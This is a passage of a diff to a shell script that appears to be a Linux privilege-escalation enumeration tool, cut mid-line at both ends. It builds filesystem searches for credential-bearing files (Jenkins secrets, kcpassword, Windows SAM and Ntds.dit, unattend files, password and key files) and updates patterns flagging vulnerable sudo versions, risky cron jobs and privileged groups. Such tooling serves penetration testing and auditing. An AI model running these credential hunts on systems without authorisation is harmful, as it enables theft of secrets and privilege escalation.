"^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KCPASSWORD=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "kcpassword$" | sort | uniq | head -n 70) + PSTORAGE_SENTRY=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) + PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "environments$" | sort | uniq | head -n 70) + PSTORAGE_CACTI=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "cacti$" | sort | uniq | head -n 70) + PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "roundcube$" | sort | uniq | head -n 70) + PSTORAGE_PASSBOLT=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) + PSTORAGE_JETTY=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70) + PSTORAGE_JENKINS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "master\.key$|hudson\.util\.Secret$|credentials\.xml$|config\.xml$|.*jenkins$" | sort | uniq | head -n 70) + PSTORAGE_WGET=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) + PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) + PSTORAGE_OTHER_INTERESTING=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) + PSTORAGE_WINDOWS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*\.rdg$|AppEvent\.Evt$|autounattend\.xml$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.inf$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$|plum\.sqlite$" | sort | uniq | head -n 70) + PSTORAGE_DATABASE=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/man/|/usr/|/var/cache/|thumbcache|iconcache|IconCache|/man/|/usr/|/var/cache/' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) + PSTORAGE_BACKUPS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "backup$|backups$" | sort | uniq | head -n 70) + PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.maintenance.*$|.*\.key$" | sort | uniq | head -n 70) + PSTORAGE_CRONTAB_UI=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "crontab\.db$|crontab-ui\.service$" | sort | uniq | head -n 70) ##### POST SERACH VARIABLES ##### backup_folders_row="$(echo $PSTORAGE_BACKUPS | tr '\n' ' ')" @@ -909,7 +950,7 @@ kernelDCW_Rhel6_3="2.6.32-279.41.1.el6|2.6.32-279.42.1.el6|2.6.32-279.43.1.el6|2 kernelDCW_Rhel6_4="2.6.32-431.71.1.el6|2.6.32-431.72.1.el6|2.6.32-431.73.2.el6|2.6.32-431.74.1.el6|2.6.32-504.el6|2.6.32-504.1.3.el6|2.6.32-504.3.3.el6|2.6.32-504.8.1.el6|2.6.32-504.8.2.bgq.el6|2.6.32-504.12.2.el6|2.6.32-504.16.2.el6|2.6.32-504.23.4.el6|2.6.32-504.30.3.el6|2.6.32-504.30.5.p7ih.el6|2.6.32-504.33.2.el6|2.6.32-504.36.1.el6|2.6.32-504.38.1.el6|2.6.32-504.40.1.el6|2.6.32-504.43.1.el6|2.6.32-504.46.1.el6|2.6.32-504.49.1.el6|2.6.32-504.50.1.el6|2.6.32-504.51.1.el6|2.6.32-504.52.1.el6|2.6.32-573.el6|2.6.32-573.1.1.el6|2.6.32-573.3.1.el6|2.6.32-573.4.2.bgq.el6|2.6.32-573.7.1.el6|2.6.32-573.8.1.el6|2.6.32-573.12.1.el6|2.6.32-573.18.1.el6|2.6.32-573.22.1.el6|2.6.32-573.26.1.el6|2.6.32-573.30.1.el6|2.6.32-573.32.1.el6|2.6.32-573.34.1.el6|2.6.32-642.el6|2.6.32-642.1.1.el6|2.6.32-642.3.1.el6|2.6.32-642.4.2.el6|2.6.32-642.6.1.el6" kernelDCW_Rhel7="3.10.0-229.rt56.141.el7|3.10.0-229.1.2.rt56.141.2.el7_1|3.10.0-229.4.2.rt56.141.6.el7_1|3.10.0-229.7.2.rt56.141.6.el7_1|3.10.0-229.11.1.rt56.141.11.el7_1|3.10.0-229.14.1.rt56.141.13.el7_1|3.10.0-229.20.1.rt56.141.14.el7_1|3.10.0-229.rt56.141.el7|3.10.0-327.rt56.204.el7|3.10.0-327.4.5.rt56.206.el7_2|3.10.0-327.10.1.rt56.211.el7_2|3.10.0-327.13.1.rt56.216.el7_2|3.10.0-327.18.2.rt56.223.el7_2|3.10.0-327.22.2.rt56.230.el7_2|3.10.0-327.28.2.rt56.234.el7_2|3.10.0-327.28.3.rt56.235.el7|3.10.0-327.36.1.rt56.237.el7|3.10.0-123.el7|3.10.0-123.1.2.el7|3.10.0-123.4.2.el7|3.10.0-123.4.4.el7|3.10.0-123.6.3.el7|3.10.0-123.8.1.el7|3.10.0-123.9.2.el7|3.10.0-123.9.3.el7|3.10.0-123.13.1.el7|3.10.0-123.13.2.el7|3.10.0-123.20.1.el7|3.10.0-229.el7|3.10.0-229.1.2.el7|3.10.0-229.4.2.el7|3.10.0-229.7.2.el7|3.10.0-229.11.1.el7|3.10.0-229.14.1.el7|3.10.0-229.20.1.el7|3.10.0-229.24.2.el7|3.10.0-229.26.2.el7|3.10.0-229.28.1.el7|3.10.0-229.30.1.el7|3.10.0-229.34.1.el7|3.10.0-229.38.1.el7|3.10.0-229.40.1.el7|3.10.0-229.42.1.el7|3.10.0-327.el7|3.10.0-327.3.1.el7|3.10.0-327.4.4.el7|3.10.0-327.4.5.el7|3.10.0-327.10.1.el7|3.10.0-327.13.1.el7|3.10.0-327.18.2.el7|3.10.0-327.22.2.el7|3.10.0-327.28.2.el7|3.10.0-327.28.3.el7|3.10.0-327.36.1.el7|3.10.0-327.36.2.el7|3.10.0-229.1.2.ael7b|3.10.0-229.4.2.ael7b|3.10.0-229.7.2.ael7b|3.10.0-229.11.1.ael7b|3.10.0-229.14.1.ael7b|3.10.0-229.20.1.ael7b|3.10.0-229.24.2.ael7b|3.10.0-229.26.2.ael7b|3.10.0-229.28.1.ael7b|3.10.0-229.30.1.ael7b|3.10.0-229.34.1.ael7b|3.10.0-229.38.1.ael7b|3.10.0-229.40.1.ael7b|3.10.0-229.42.1.ael7b|4.2.0-0.21.el7" -sudovB="[01].[012345678].[0-9]+|1.9.[01234][^0-9]|1.9.[01234]$|1.9.5p1|1\.9\.[6-9]|1\.9\.1[0-7]" +sudovB="[01].[012345678].[0-9]+|1.9.[01234][^0-9]|1.9.[01234]$|1.9.5p1|1\.9\.[6-9]|1\.9\.1[0-6]|1\.9\.17([^p]|$)" mountpermsB="\Wsuid|\Wuser|\Wexec" @@ -947,14 +988,14 @@ processesVB='jdwp|tmux |screen | inspect |--inspect=|--inspect |--inspect$|--inp cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|exim4-base|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|mod-pagespeed|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-motd|update-notifier-common|upstart|" -cronjobsB="centreon" +cronjobsB="centreon|pg_basebackup|run-parts|crontab-ui" timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|dpkg-db-backup.timer|e2scrub_all.timer|exim4-base.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|plocate-updatedb.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer" -Groups="ImPoSSssSiBlEee"$(groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|') - PASSTRY="2000" #Default num of passwds to try (all by default) +Groups="ImPoSSssSiBlEee"$(groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|') + groupsB="\(root\)|\(shadow\)|\(admin\)|\(video\)|\(adm\)|\(wheel\)|\(auth\)|\(staff\)" groupsVB="\(sudo\)|\(docker\)|\(lxd\)|\(disk\)|\(lxc\)" @@ -974,33 +1015,17 @@ idB="euid|egid$baduid" knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' #https://www.togaware.com/linux/survivor/Standard_Groups.html -sudoB="$(whoami)|ALL:ALL|ALL : 